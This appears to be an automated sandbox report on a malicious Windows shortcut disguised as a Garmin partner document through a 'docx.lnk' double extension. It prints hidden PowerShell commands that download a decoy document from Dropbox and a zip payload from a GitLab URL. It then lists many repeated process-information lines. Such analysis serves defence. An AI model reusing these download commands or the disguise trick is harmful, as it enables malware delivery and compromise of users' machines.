Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V3.docx'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/stare2/garmin/-/raw/main/fuknew1112.zip', 'C:\Users\Public\Document.zip')"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/4p5pc2fbhxx7mz0qnortk/Garmin_Campaign_Information_for_Partners_V3.docx?rlkey=wuzagfqo68p4k9sn4yxo7i950&st=ss9gx9y8&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V3.docx')"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V3.docx'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/stare2/garmin/-/raw/main/fuknew1112.zip', 'C:\Users\Public\Document.zip')"	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 15_2_00007FFD348B2325 pushad ; iretd		15_2_00007FFD348B236D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 15_2_00007FFD348B7047 push esp; retf		15_2_00007FFD348B7048

Persistence and Installation Behavior

Windows shortcut file (LNK) starts blacklisted processes

Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Jump to behavior
Source: LNK file	Process created: C:\Windows\System32\cmd.exe	Jump to behavior
Source: LNK file	Process created: C:\Windows\System32\cmd.exe	Jump to behavior
Source: LNK file	Process created: C:\Windows\System32\cmd.exe	Jump to behavior
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Jump to behavior
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Jump to behavior
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Jump to behavior

Tries to download and execute files (via powershell)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/4p5pc2fbhxx7mz0qnortk/Garmin_Campaign_Information_for_Partners_V3.docx?rlkey=wuzagfqo68p4k9sn4yxo7i950&st=ss9gx9y8&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V3.docx')"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/stare2/garmin/-/raw/main/fuknew1112.zip', 'C:\Users\Public\Document.zip')"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/4p5pc2fbhxx7mz0qnortk/Garmin_Campaign_Information_for_Partners_V3.docx?rlkey=wuzagfqo68p4k9sn4yxo7i950&st=ss9gx9y8&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V3.docx')"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/stare2/garmin/-/raw/main/fuknew1112.zip', 'C:\Users\Public\Document.zip')"	Jump to behavior

Hooking and other Techniques for Hiding and Protection

Uses an obfuscated file name to hide its real file extension (double extension)

Source: Possible double extension: docx.lnk

Static PE information: 3_Garmin_Campaign Information for Partners(12-11).docx.lnk.download.lnk

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
